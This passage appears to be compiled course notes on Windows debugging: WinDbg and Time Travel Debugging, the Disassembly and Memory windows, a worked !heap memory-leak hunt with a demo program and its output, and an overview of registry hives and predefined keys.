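// Models the flag effects of "cmp a, b" on 32-bit operands.
inline Flags cmp32(std::uint32_t a, std::uint32_t b) {
    const std::uint32_t r = a - b;  // wraps modulo 2^32, like the CPU
    Flags f;
    f.zf = (r == 0);
    f.cf = (a < b);
    // Signed overflow on subtraction: the operands have different signs
    // and the sign of the result differs from the sign of a.
    f.of = (((a ^ b) & (a ^ r)) >> 31) != 0;
    return f;
}

inline void example_cmp() {
    assert(cmp32(5, 5).zf);                 // equal operands set ZF
    assert(cmp32(3, 5).cf);                 // 3 < 5 unsigned sets CF
    assert(cmp32(0x80000000u, 1).of);       // INT_MIN - 1 overflows
}
```

A conditional jump such as jz or jb then only has to look at these bits; it never sees the original operands.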
https://wiki.skullsecurity.org/index.php/Registers

Introduction Windows Debugger

There are several debugging programs available on Windows. OllyDbg and Immunity
Debugger are well-known in the reverse engineering and exploit development world for
their user-friendly interface. Immunity Debugger originally began as a fork of OllyDbg but it has
since surpassed OllyDbg’s functionality. Despite the convenience of these programs, we will
use Microsoft's WinDbg debugger exclusively in this course. This is because WinDbg provides
the same scripting features available in Immunity Debugger, along with the availability of both
32- and 64-bit versions. While an open source implementation of OllyDbg for 64-bit exists, it
does not provide the same features or support as WinDbg. WinDbg is also our preferred
debugger because it can debug in both user-mode and kernel-mode, which makes it the best
fit for the development of any kind of exploits leveraged on Windows. WinDbg is provided as
part of the Software Development Kit (SDK), the Windows Driver Kit (WDK), and the Debugging
Tools for Windows, free-of-charge.

What is Time Travel Debugging?

Time Travel Debugging is a tool that allows you to record an execution of your process
and then replay it later, both forwards and backwards. Time Travel Debugging (TTD) can
help you debug issues more easily by letting you "rewind" your debugger session, instead of having
to reproduce the issue until you find the bug.

TTD allows you to go back in time to better understand the conditions that lead up to the bug
and replay it multiple times to learn how best to fix the problem.

TTD can have advantages over crash dump files, which often are missing the code execution
that led up to the ultimate failure.

In the event you can't figure out the issue yourself, you can share the trace with a co-worker
and they can look at exactly what you're looking at. This can allow for easier collaboration than
live debugging, as the recorded instructions are the same, where the address locations and
code execution will be different on different PCs. You can also share a specific point in time to
help your co-worker figure out where to start.

TTD is efficient and works to add as little overhead as possible as it captures code execution in
trace files.

TTD includes a set of debugger data model objects to allow you to query the trace using LINQ.
For example, you can use TTD objects to locate when a specific code module was loaded or
locate all of the exceptions.

Comparison of Debugging Tools

This table summarizes the pros and cons of the different debugging solutions available.

Approach: Live debugging
Pros: Interactive experience, sees flow of execution, can change target state, familiar tool in
familiar setting.
Cons: Disrupts the user experience, may require effort to reproduce the issue repeatedly, may
impact security, not always an option on production systems. With repro difficult to work back
from point of failure to determine cause.

Approach: Dumps
Pros: No coding upfront, low-intrusiveness, based on triggers.
Cons: Successive snapshot or live dumps provide a simple “over time” view. Overhead is
essentially zero if not used.

Approach: Telemetry & logs
Pros: Lightweight, often tied to business scenarios / user actions, machine learning friendly.
Cons: Issues arise in unexpected code paths (with no telemetry). Lack of data depth, statically
compiled into the code.

Approach: Time Travel Debugging (TTD)
Pros: Great at complex bugs, no coding upfront, offline repeatable debugging, analysis friendly,
captures everything.
Cons: Large overhead at record time. May collect more data than is needed. Data files can
become large.

TTD Availability

TTD is available on Windows 10 after installing the WinDbg Preview app from the Store.
WinDbg Preview is an improved version of WinDbg with more modern visuals, faster windows,
a full-fledged scripting experience, with built in support for the extensible debugger data
model. For more information on downloading WinDbg Preview from the store, see Debugging
Using WinDbg Preview.

Administrator rights required to use TTD

To use TTD, you need to run the debugger elevated. Install WinDbg Preview using an account
that has administrator privileges and use that account when recording in the debugger. In
order to run the debugger elevated, select and hold (or right-click) the WinDbg Preview icon in
the Start menu and then select More > Run as Administrator.

https://docs.microsoft.com/en-gb/windows-hardware/drivers/debugger/time-travel-debugging-overview

https://docs.microsoft.com/pt-br/windows-hardware/drivers/debugger/debugger-download-tools

https://developer.microsoft.com/en-us/windows/hardware/download-windbg

Disassembly Window

The Disassembly window displays executable code in assembly language.

Opening the Disassembly Window

To open or switch to the Disassembly window, in the WinDbg window, on the View menu,
click Disassembly. (You can also press ALT+7 or click the Disassembly (Alt+7) button on
the toolbar. ALT+SHIFT+7 will close the Disassembly window.)

The following figure shows an example of a Disassembly window.

The debugger takes a section of memory, interprets it as binary machine instructions, and then
disassembles it to produce an assembly-language version of the machine instructions. The
resulting code is displayed in the Disassembly window.

Using the Disassembly Window

In the Disassembly window, you can do the following:

• To disassemble a different section of memory, in the Offset box, type the address of
the memory you want to disassemble. (You can press ENTER after typing the address,
but you do not have to.) The Disassembly window displays code before you have
completed the address; you can disregard this code.

• To see other sections of memory, click the Previous or Next button or press the
PAGE UP or PAGE DOWN keys. These commands display disassembled code from the
preceding or following sections of memory, respectively. By pressing the RIGHT
ARROW, LEFT ARROW, UP ARROW, and DOWN ARROW keys, you can navigate within
the window. If you use these keys to move off of the page, a new page will appear.

• If you want to disassemble a section of memory that does not contain machine
instructions, the debugger displays error messages.

• The line that represents the current program counter is highlighted in green, unless
you select a line with the mouse or by using one of the Edit | Go to Xxx commands. If
you select a line with the mouse or an Edit | Go to Xxx command, the selected line is
green and the line that represents the current program counter is not highlighted.

• Lines at which breakpoints are set are highlighted. An enabled breakpoint is
highlighted in red, a disabled breakpoint is highlighted in yellow, and a breakpoint
that coincides with the current program counter is highlighted in purple.

Toolbar and Shortcut Menu

The Disassembly window has a toolbar that contains two buttons and a shortcut menu with
additional commands. To access the menu, right-click the title bar or click the icon that
appears near the upper-right corner of the window. The toolbar and menu contain the
following commands:

• (Toolbar only) The Offset box enables you to specify a new address for disassembly.

• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) causes the debugger to disassemble and display the instructions immediately
prior to the current display.

• (Toolbar and menu) Next (on the toolbar) or Next page (on the shortcut menu) causes
the debugger to disassemble and display the instructions immediately after the
current display.

• (Menu only) Go to current address opens the Source window with the source file that
corresponds to the selected line in the Disassembly window and highlights this line.

• (Menu only) Disassemble before current instruction causes the current line to be
placed in the middle of the Disassembly window. This command is the default option.
If this command is cleared the current line will appear at the top of the Disassembly
window, which saves time because reverse-direction disassembly can be time-
consuming.

• (Menu only) Highlight instructions from the current source line causes all of the
instructions that correspond to the current source line to be highlighted. Often, a
single source line will correspond to multiple assembly instructions. If code has been
optimized, these assembly instructions might not be consecutive. This command
enables you to find all of the instructions that were assembled from the current source
line.

• (Menu only) Show source line for each instruction displays the source line number
that corresponds to each assembly instruction.

• (Menu only) Show source file for each instruction displays the source file name that
corresponds to each assembly instruction.

• (Menu only) Toolbar turns the toolbar on and off.

• (Menu only) Dock or Undock causes the window to enter or leave the docked state.

• (Menu only) Move to new dock closes the Disassembly window and opens it in a new
dock.

• (Menu only) Set as tab-dock target for window type is unavailable for the Disassembly
window. This option is only available for Source or Memory windows.

• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.

• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.

• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.

• (Menu only) Close closes this window.

http://www.dbgtech.net/windbghelp/hh/debugger/r36_gui_1_f9c06d65-64ae-4439-bb41-318a12e6c859.xml.htm

Debugger Command Window

You can view memory by entering one of the Display Memory commands in the Debugger
Command window. You can edit memory by entering one of the Enter Values commands in
the Debugger Command window. For more information, see Accessing Memory by Virtual
Address and Accessing Memory by Physical Address.

Opening a Memory Window

To open a Memory window, choose Memory from the View menu. (You can also press ALT+5
or select the Memory button on the toolbar. ALT+SHIFT+5 closes the active Memory
window.)

The following screen shot shows an example of a Memory window.

Using a Memory Window

The Memory window displays data in several columns. The column on the left side of the
window shows the beginning address of each line. The remaining columns display the
requested information, from left to right. If you select Bytes in the Display format menu, the
ASCII characters that correspond to these bytes are displayed in the right side of the window.
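
The column layout described above (address on the left, data in the middle, ASCII on the right) can be sketched in C++. This imitates the general shape of a byte display and is not WinDbg's exact output format; the function name and spacing are assumptions for illustration.

```cpp
#include <cassert>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Formats one line of a byte display: start address, hex bytes, then the
// ASCII characters for those bytes ('.' for anything non-printable).
inline std::string format_memory_line(std::uint32_t address,
                                      const std::vector<std::uint8_t>& bytes) {
    char buf[16];
    std::snprintf(buf, sizeof buf, "%08x ", static_cast<unsigned>(address));
    std::string line = buf;
    std::string ascii;
    for (std::uint8_t b : bytes) {
        std::snprintf(buf, sizeof buf, " %02x", static_cast<unsigned>(b));
        line += buf;
        ascii += (b >= 0x20 && b < 0x7f) ? static_cast<char>(b) : '.';
    }
    return line + "  " + ascii;
}

inline void example_memory_line() {
    // 'H', 'i', a NUL byte and '!' at an arbitrary example address.
    std::string s = format_memory_line(0x00401000u, {0x48, 0x69, 0x00, 0x21});
    assert(s == "00401000  48 69 00 21  Hi.!");
}
```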

Note By default, the Memory window displays virtual memory. This type of memory is the
only type of memory that is available in user mode. In kernel mode, you can use the Memory
Options dialog box to display physical memory and other data spaces. The Memory
Options dialog box is described later in this topic.

In the Memory window, you can do the following:

• To write to memory, select inside the Memory window and type new data. You can
edit only hexadecimal data—you cannot directly edit ASCII and Unicode characters.
Changes take effect as soon as you type new information.

• To see other sections of memory, use the Previous and Next buttons on the Memory
window toolbar, or press the PAGE UP or PAGE DOWN keys. These buttons and keys
display the immediately preceding or following sections of memory. If you request an
invalid page, an error message appears.

• To navigate within the window, use the RIGHT ARROW, LEFT ARROW, UP ARROW, and
DOWN ARROW keys. If you use these keys to move off of the page, a new page is
displayed. Before you use these keys, you should resize the Memory window so that it
does not have scroll bars. This sizing enables you to distinguish between the actual
page edge and the window cutoff.

• To change the memory location that is being viewed, enter a new address into the
address box at the top of the Memory window. Note that the Memory window
refreshes its display while you enter an address, so you could get error messages
before you have completed typing the address. Note The address that you enter into
the box is interpreted in the current radix. If the current radix is not 16, you should
prefix a hexadecimal address with 0x. To change the default radix, use the n (Set
Number Base) command in the Debugger Command window. The display within the
Memory window itself is not affected by the current radix.

• To change the data type that the window uses to display memory, use the Display
format menu in the Memory window toolbar. Supported data types include short
words, double words, and quad-words; short, long, and quad integers and unsigned
integers; 10-byte, 16-byte, 32-byte, and 64-byte real numbers; ASCII characters;
Unicode characters; and hexadecimal bytes. The display of hexadecimal bytes includes
ASCII characters as well.
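
The radix rule from the address-box note above can be sketched as follows: digits are read in the current radix, and a 0x prefix forces hexadecimal. This is a minimal sketch of that rule only, not of WinDbg's full expression evaluator; parse_address is a hypothetical helper.

```cpp
#include <cassert>
#include <cctype>
#include <cerrno>
#include <cstdint>
#include <cstdlib>
#include <string>

// Parses an address typed by the user. Returns true and stores the value in
// 'out' on success. 'current_radix' plays the role of the debugger's default
// number base (for example 10 or 16).
inline bool parse_address(const std::string& text, int current_radix,
                          std::uint64_t& out) {
    std::string digits = text;
    int radix = current_radix;
    // A 0x prefix overrides the current radix and selects hexadecimal.
    if (digits.size() > 2 && digits[0] == '0' &&
        (digits[1] == 'x' || digits[1] == 'X')) {
        digits = digits.substr(2);
        radix = 16;
    }
    // Reject empty input, signs and leading whitespace.
    if (digits.empty() || !std::isalnum(static_cast<unsigned char>(digits[0])))
        return false;
    char* end = nullptr;
    errno = 0;
    const unsigned long long value = std::strtoull(digits.c_str(), &end, radix);
    if (errno != 0 || *end != '\0') return false;  // overflow or stray characters
    out = value;
    return true;
}

inline void example_parse_address() {
    std::uint64_t v = 0;
    assert(parse_address("401000", 16, v) && v == 0x401000);    // hex radix
    assert(parse_address("401000", 10, v) && v == 401000);      // decimal radix
    assert(parse_address("0x401000", 10, v) && v == 0x401000);  // prefix wins
}
```

The same text yields two different addresses depending on the radix, which is why prefixing hexadecimal addresses with 0x is the safer habit.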

The Memory window has a toolbar that contains two buttons, a menu, and a box and has a
shortcut menu with additional commands. To access the menu, select and hold (or right-click)
the title bar or select the icon near the upper-right corner of the window. The toolbar
and shortcut menu contain the following choices:

• (Toolbar only) The address box enables you to specify a new address or offset. The
exact meaning of this box depends on the memory type you are viewing. For example,
if you are viewing virtual memory, the box enables you to specify a new virtual address
or offset.

• (Toolbar only) Display format enables you to select a new display format.

• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) cause the previous section of memory to be displayed.

• (Toolbar and menu) Next (on the toolbar) and Next page (on the shortcut menu) cause
the next section of memory to be displayed.

• (Menu only) Toolbar turns the toolbar on and off.

• (Menu only) Auto-fit columns ensures that the number of columns displayed in the
Memory window fits the width of the Memory window.

• (Menu only) Dock or Undock causes the window to enter or leave the docked state.

• (Menu only) Move to new dock closes the Memory window and opens it in a new
dock.

• (Menu only) Set as tab-dock target for window type sets the selected Memory
window as the tab-dock target for other Memory windows. All Memory windows that
are opened after one is chosen as the tab-dock target are automatically grouped with
that window in a tabbed collection.

• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.

• (Menu only) Properties opens the Memory Options dialog box, which is described in
the following section within this topic.

• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.

• (Menu only) Close closes this window.

Memory Options Dialog Box

When you select Properties on the shortcut menu, the Memory Options dialog box appears.

In kernel mode, there are six memory types available as tabs in this dialog box: Virtual
Memory, Physical Memory, Bus Data, Control Data, I/O (I/O port information),
and MSR (model-specific register information). Select the tab that corresponds to the
information that you want to access.

In user mode, only the Virtual Memory tab is available.

Each tab enables you to specify the memory that you want to display:

• In the Virtual Memory tab, in the Offset box, specify the address or offset of the
beginning of the memory range that you want to view.

• In the Physical Memory tab, in the Offset box, specify the physical address of the
beginning of the memory range that you want to view. The Memory window can
display only described, cacheable physical memory. If you want to display physical
memory that has other attributes, use the d* (Display Memory) command or
the !d* extension.

• In the Bus Data tab, in the Bus Data Type menu, specify the bus data type. Then, use
the Bus number, Slot number, and Offset boxes to specify the bus data that you want
to view.

• In the Control Data tab, use the Processor and Offset text boxes to specify the control
data that you want to view.

• In the I/O tab, in the Interface Type menu, specify the I/O interface type. Use the Bus
number, Address space, and Offset boxes to specify the data that you want to view.

• In the MSR tab, in the MSR box, specify the model-specific register that you want to
view.

Each tab also includes a Display format menu. This menu has the same effect as the Display
format menu in the Memory window.

Select OK in the Memory Options dialog box to cause your changes to take effect.

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/memory-window

Command

Use the command menu to:

• Prefer DML

• Highlight and Un-highlight the current text selection (CTRL+ALT+H)

• Clear the command window text

• Save window text to a dml file

Memory

Use the memory menu to:

• Set a data model memory query

• Set the memory size, for example to byte or long

• Set the display format, for example hex or signed

• Set the text display format, for example to ASCII

Source

Use the source menu to:

• Open a source file

• Set an instruction pointer

• Run to cursor

• Close all source windows

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-notes-etc-preview

Introduction

Memory leaks are time-consuming bugs often created by C++ developers. Detecting memory
leaks is often tedious. Things get worse if the code was not written by you, or if the code base is
quite large.

Though there are tools available in the market that will help you in memory leak detection,
most of these tools are not free. I found Windbg to be a powerful, free tool for tracking down
memory leak bugs. At the least, it gives us an idea of the code location that is suspected of
causing memory leaks. COM interface leaks are out of the scope of this article.

Windbg is a powerful user/kernel space debugger from Microsoft, which can be downloaded
and installed from Microsoft's website.

Using Windbg

To start working with Windbg:

1. Configure the symbol file path to the Microsoft symbol server

“SRV*d:\symbols*http://msdl.microsoft.com/download/symbols”.

2. Add your program EXE/DLL PDB (program database) path to the symbol file path.

3. You also need to configure the operating system's flags to enable user stack traces for
the process which has memory leaks. This is simple, and can be done
with gflags.exe. Gflags.exe is installed during Windbg's installation. This can also be
done through the command line, using the command “gflags.exe /i MemoryLeak.exe
+ust”. My program name is Test2.exe; hence, for the demo, I will be
using Test2.exe rather than MemoryLeak.exe. The snapshot below shows the setting of
OS flags for the application Test2.exe.

Once we have configured Windbg for the symbol file path, start the process which is leaking
memory, and attach Windbg to it. The Attach option in Windbg is available under the File
menu, or can be launched using the F6 shortcut. The snapshot below shows the same:

The !heap command of Windbg is used to display heaps. !heap is well documented in the
Windbg help.

I have developed a small program which leaks memory, and will demonstrate further using the
same.

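#include <windows.h>
#include <tchar.h>

// Allocates an integer array and never frees it, so every call leaks it.
void AllocateMemory()
{
    int* a = new int[2000];
    ZeroMemory(a, 8000);   // 2000 ints * 4 bytes each
    Sleep(1);
}

int _tmain(int argc, _TCHAR* argv[])
{
    while (1)
        AllocateMemory();
    return 0;
}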

The above program leaks an integer array of size 2000*4 bytes.

After attaching Windbg to the process, execute the !heap -s command. -s stands for summary.
Below is the output of !heap -s for the leaking process:


0:001> !heap -s

NtGlobalFlag enables following debugging aids for new heaps:

validate parameters

stack back traces

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast

(k) (k) (k) (k) length blocks cont. heap

-----------------------------------------------------------------------------

00150000 58000062 1024 12 12 1 1 1 0 0 L

00250000 58001062 64 24 24 15 1 1 0 0 L

00260000 58008060 64 12 12 10 1 1 0 0

00330000 58001062 64576 47404 47404 13 4 1 0 0

-----------------------------------------------------------------------------

Let the process execute for some time, and then re-break in to the process, and execute !heap
-s again. Shown below is the output of the command:


0:001> !heap -s

NtGlobalFlag enables following debugging aids for new heaps:

validate parameters

stack back traces

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast

(k) (k) (k) (k) length blocks cont. heap

-----------------------------------------------------------------------------

00150000 58000062 1024 12 12 1 1 1 0 0 L

00250000 58001062 64 24 24 15 1 1 0 0 L

00260000 58008060 64 12 12 10 1 1 0 0

00330000 58001062 261184 239484 239484 14 4 1 0 0

-----------------------------------------------------------------------------

The last row of each listing shows the growing heap: the heap with the
handle 00330000 grew from 47404 k to 239484 k committed between the two snapshots.

Execute “!heap -stat -h 00330000” for the growing heap. This command shows the heap
statistics for the growing heap. Shown below is the command's output.


0:001> !heap -stat -h 00330000

heap @ 00330000

group-by: TOTSIZE max-display: 20

size #blocks total ( %) (percent of total busy bytes)

1f64 76c6 - e905f58 (99.99)

1800 1 - 1800 (0.00)

824 2 - 1048 (0.00)

238 2 - 470 (0.00)

244 1 - 244 (0.00)

4c 5 - 17c (0.00)

b0 2 - 160 (0.00)

86 2 - 10c (0.00)

50 3 - f0 (0.00)

74 2 - e8 (0.00)

38 4 - e0 (0.00)

48 3 - d8 (0.00)

c4 1 - c4 (0.00)

62 2 - c4 (0.00)

be 1 - be (0.00)

b8 1 - b8 (0.00)

ae 1 - ae (0.00)

ac 1 - ac (0.00)

55 2 - aa (0.00)
a4 1 - a4 (0.00)

The first row of the output above shows 0x76c6 blocks of size 1f64 being allocated. Such a
huge number of blocks of the same size makes us suspect that these are leaked blocks. The rest
of the block allocations do not have growing block numbers.
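
The numbers in that first row can be checked by hand: the block count times the block size should equal the reported total. The sketch below does the arithmetic in C++; the function names are made up for illustration. The 36 bytes by which 0x1f64 exceeds the 8000 bytes requested are presumably bookkeeping added by the debug runtime, which is an assumption and not something the output states.

```cpp
#include <cassert>
#include <cstdint>

// Total bytes held by 'block_count' blocks of 'block_size' bytes each.
inline std::uint64_t total_bytes(std::uint64_t block_size,
                                 std::uint64_t block_count) {
    return block_size * block_count;
}

// Bytes per block beyond what the program asked for.
inline std::uint64_t overhead_per_block(std::uint64_t reported_size,
                                        std::uint64_t requested_size) {
    return reported_size - requested_size;
}

inline void example_heap_stat_row() {
    // Row "1f64 76c6 - e905f58": size, #blocks and total, all in hex.
    assert(total_bytes(0x1f64, 0x76c6) == 0xe905f58);
    // new int[2000] requests 2000 * 4 = 8000 bytes; the heap reports 0x1f64 = 8036.
    assert(overhead_per_block(0x1f64, 2000 * 4) == 36);
}
```

In decimal, that is 30406 blocks of 8036 bytes, or roughly 233 MB, which matches the committed size reported by !heap -s.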

The next step is to get the address of these blocks. Use the command !heap -flt s 1f64. This
command filters all other blocks of heap and displays the details of blocks having size 1f64.

Shown below is the output for the command:


0:001> !heap -flt s 1f64

_HEAP @ 150000

_HEAP @ 250000

_HEAP @ 260000

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

003360e0 03f0 0000 [07] 003360e8 01f64 - (busy)

00338060 03f0 03f0 [07] 00338068 01f64 - (busy)

00339fe0 03f0 03f0 [07] 00339fe8 01f64 - (busy)

0033bf60 03f0 03f0 [07] 0033bf68 01f64 - (busy)

0033dee0 03f0 03f0 [07] 0033dee8 01f64 - (busy)

01420040 03f0 03f0 [07] 01420048 01f64 - (busy)

01421fc0 03f0 03f0 [07] 01421fc8 01f64 - (busy)

01423f40 03f0 03f0 [07] 01423f48 01f64 - (busy)

01425ec0 03f0 03f0 [07] 01425ec8 01f64 - (busy)

01427e40 03f0 03f0 [07] 01427e48 01f64 - (busy)

01429dc0 03f0 03f0 [07] 01429dc8 01f64 - (busy)

0142bd40 03f0 03f0 [07] 0142bd48 01f64 - (busy)

0142dcc0 03f0 03f0 [07] 0142dcc8 01f64 - (busy)

0142fc40 03f0 03f0 [07] 0142fc48 01f64 - (busy)

01431bc0 03f0 03f0 [07] 01431bc8 01f64 - (busy)

01433b40 03f0 03f0 [07] 01433b48 01f64 - (busy)

01435ac0 03f0 03f0 [07] 01435ac8 01f64 - (busy)

01437a40 03f0 03f0 [07] 01437a48 01f64 - (busy)

014399c0 03f0 03f0 [07] 014399c8 01f64 - (busy)

0143b940 03f0 03f0 [07] 0143b948 01f64 - (busy)

0143d8c0 03f0 03f0 [07] 0143d8c8 01f64 - (busy)

0143f840 03f0 03f0 [07] 0143f848 01f64 - (busy)

014417c0 03f0 03f0 [07] 014417c8 01f64 - (busy)

01443740 03f0 03f0 [07] 01443748 01f64 - (busy)

014456c0 03f0 03f0 [07] 014456c8 01f64 - (busy)

01447640 03f0 03f0 [07] 01447648 01f64 - (busy)

014495c0 03f0 03f0 [07] 014495c8 01f64 - (busy)

0144b540 03f0 03f0 [07] 0144b548 01f64 - (busy)

0144d4c0 03f0 03f0 [07] 0144d4c8 01f64 - (busy)

0144f440 03f0 03f0 [07] 0144f448 01f64 - (busy)

014513c0 03f0 03f0 [07] 014513c8 01f64 - (busy)

01453340 03f0 03f0 [07] 01453348 01f64 - (busy)

014552c0 03f0 03f0 [07] 014552c8 01f64 - (busy)

01457240 03f0 03f0 [07] 01457248 01f64 - (busy)

014591c0 03f0 03f0 [07] 014591c8 01f64 - (busy)

0145b140 03f0 03f0 [07] 0145b148 01f64 - (busy)

0145d0c0 03f0 03f0 [07] 0145d0c8 01f64 - (busy)

0145f040 03f0 03f0 [07] 0145f048 01f64 - (busy)

01460fc0 03f0 03f0 [07] 01460fc8 01f64 - (busy)

01462f40 03f0 03f0 [07] 01462f48 01f64 - (busy)

01464ec0 03f0 03f0 [07] 01464ec8 01f64 - (busy)

01466e40 03f0 03f0 [07] 01466e48 01f64 - (busy)

01468dc0 03f0 03f0 [07] 01468dc8 01f64 - (busy)

Use any UserPtr column value from the listed output, and then use the command !heap -p -a
UserPtr to display the call stack for that allocation. I have selected 0143d8c8.

Upon execution of !heap -p -a 0143d8c8, we get the call stack shown below:


0:001> !heap -p -a 0143d8c8

address 0143d8c8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

0143d8c0 03f0 0000 [07] 0143d8c8 01f64 - (busy)

Trace: 0025

7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1

7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044

7c91b298 ntdll!RtlAllocateHeap+0x00000e64

102c103e MSVCR90D!_heap_alloc_base+0x0000005e

102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6

102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f

102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c

102db25b MSVCR90D!malloc+0x0000001b

102bd691 MSVCR90D!operator new+0x00000011

102bd71f MSVCR90D!operator new[]+0x0000000f

4113d8 Test2!AllocateMemory+0x00000028

41145c Test2!wmain+0x0000002c

411a08 Test2!__tmainCRTStartup+0x000001a8

41184f Test2!wmainCRTStartup+0x0000000f

7c816fd7 kernel32!BaseProcessStart+0x00000023

The frames prefixed with Test2! (Test2!AllocateMemory and Test2!wmain) are the functions from our code.

Note: Sometimes, it might happen that the “!heap -s” command does not show a growing
heap. In that case, use the “!heap -stat -h” command to list all the heaps with their sizes and
number of blocks. Spot the growing number of blocks, and then use the “!heap -flt s SIZE”
(SIZE = the size of the suspected block) command.
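
"Spot the growing number of blocks" amounts to comparing two !heap -stat snapshots taken some time apart. A minimal C++ sketch of that comparison follows, assuming the size and #blocks columns of each snapshot have already been copied into a map by hand. The HeapStat alias, the function name and the "before" counts are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <vector>

// One !heap -stat snapshot: block size -> number of blocks of that size.
using HeapStat = std::map<std::uint32_t, std::uint32_t>;

// Returns the block sizes whose block count increased between two snapshots.
// Sizes that only appear in the later snapshot count as growing from zero.
inline std::vector<std::uint32_t> growing_sizes(const HeapStat& before,
                                                const HeapStat& after) {
    std::vector<std::uint32_t> result;
    for (const auto& entry : after) {
        const auto it = before.find(entry.first);
        const std::uint32_t old_count = (it == before.end()) ? 0 : it->second;
        if (entry.second > old_count) result.push_back(entry.first);
    }
    return result;
}

inline void example_growing_sizes() {
    // The "before" counts are invented; the "after" counts come from the
    // first three rows of the !heap -stat output shown earlier.
    const HeapStat before = {{0x1f64, 0x100}, {0x1800, 1}, {0x824, 2}};
    const HeapStat after  = {{0x1f64, 0x76c6}, {0x1800, 1}, {0x824, 2}};
    const std::vector<std::uint32_t> grown = growing_sizes(before, after);
    assert(grown.size() == 1 && grown[0] == 0x1f64);
}
```

Each size returned is a candidate value for SIZE in the !heap -flt s command.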

https://www.codeproject.com/Articles/31382/Memory-Leak-Detection-Using-Windbg

Windows Registry

Description of the registry

The Microsoft Computer Dictionary, Fifth Edition, defines the registry as:

A central hierarchical database used in Windows 98, Windows CE, Windows NT, and Windows
2000 used to store information that is necessary to configure the system for one or more
users, applications, and hardware devices.

The Registry contains information that Windows continually references during operation, such
as profiles for each user, the applications installed on the computer and the types of
documents that each can create, property sheet settings for folders and application icons,
what hardware exists on the system, and the ports that are being used.

The Registry replaces most of the text-based .ini files that are used in Windows 3.x and MS-
DOS configuration files, such as the Autoexec.bat and Config.sys. Although the Registry is
common to several Windows operating systems, there are some differences among them. A
registry hive is a group of keys, subkeys, and values in the registry that has a set of supporting
files that contain backups of its data. The supporting files for all hives except
HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config folder on Windows NT 4.0,
Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. The supporting files
for HKEY_CURRENT_USER are in the %SystemRoot%\Profiles\Username folder. The file name
extensions of the files in these folders indicate the type of data that they contain. Also, the lack
of an extension may sometimes indicate the type of data that they contain.

Registry hive Supporting files

HKEY_LOCAL_MACHINE\SAM Sam, Sam.log, Sam.sav

HKEY_LOCAL_MACHINE\Security Security, Security.log, Security.sav

HKEY_LOCAL_MACHINE\Software Software, Software.log, Software.sav

HKEY_LOCAL_MACHINE\System System, System.alt, System.log, System.sav

HKEY_CURRENT_CONFIG System, System.alt, System.log, System.sav, Ntuser.dat, Ntuser.dat.log

HKEY_USERS\DEFAULT Default, Default.log, Default.sav

In Windows 98, the registry files are named User.dat and System.dat. In Windows Millennium
Edition, the registry files are named Classes.dat, User.dat, and System.dat.

Note

Security features in Windows let an administrator control access to registry keys.

The following table lists the predefined keys that are used by the system. The maximum size of
a key name is 255 characters.

Folder/predefined key Description

HKEY_CURRENT_USER Contains the root of the configuration information for the user who is
currently logged on. The user's folders, screen colors, and Control Panel settings are stored
here. This information is associated with the user's profile. This key is sometimes abbreviated
as HKCU.

HKEY_USERS Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a
subkey of HKEY_USERS. HKEY_USERS is sometimes abbreviated as HKU.

HKEY_LOCAL_MACHINE Contains configuration information particular to the computer (for any user).
This key is sometimes abbreviated as HKLM.

HKEY_CLASSES_ROOT Is a subkey of HKEY_LOCAL_MACHINE\Software. The information that is stored here
makes sure that the correct program opens when you open a file by using Windows Explorer. This key
is sometimes abbreviated as HKCR. Starting with Windows 2000, this information is stored
under both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER keys.
The HKEY_LOCAL_MACHINE\Software\Classes key contains default settings that can apply to
all users on the local computer. The HKEY_CURRENT_USER\Software\Classes key contains
settings that override the default settings and apply only to the interactive user. The
HKEY_CLASSES_ROOT key provides a view of the registry that merges the information from
these two sources. HKEY_CLASSES_ROOT also provides this merged view for programs that are
designed for earlier versions of Windows. To change the settings for the interactive user,
changes must be made under HKEY_CURRENT_USER\Software\Classes instead of under
HKEY_CLASSES_ROOT. To change the default settings, changes must be made
under HKEY_LOCAL_MACHINE\Software\Classes. If you write keys to a key under
HKEY_CLASSES_ROOT, the system stores the information
under HKEY_LOCAL_MACHINE\Software\Classes. If you write values to a key under
HKEY_CLASSES_ROOT, and the key already exists
under HKEY_CURRENT_USER\Software\Classes, the system will store the information there
instead of under HKEY_LOCAL_MACHINE\Software\Classes.

HKEY_CURRENT_CONFIG Contains information about the hardware profile that is used by the local computer at sys
startup.
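
The merge and write rules described for HKEY_CLASSES_ROOT can be modelled with two plain dictionaries. This is only a toy sketch: the dictionaries, the function names (hkcr_view, hkcr_write), and the sample entries are invented for illustration, and no real registry API is called.

```python
# Toy model of the HKEY_CLASSES_ROOT merged view (no real registry access).
# Both dictionaries and their contents are hypothetical sample data.
hklm_classes = {".txt": "txtfile", ".log": "txtfile"}   # machine-wide defaults
hkcu_classes = {".txt": "MyEditor.Document"}            # per-user overrides


def hkcr_view(hklm, hkcu):
    """Return the merged view: per-user settings override the defaults."""
    merged = dict(hklm)
    merged.update(hkcu)
    return merged


def hkcr_write(hklm, hkcu, key, value):
    """Apply the write rule from the text: if the key already exists in the
    per-user classes it is stored there, otherwise under the defaults."""
    target = hkcu if key in hkcu else hklm
    target[key] = value


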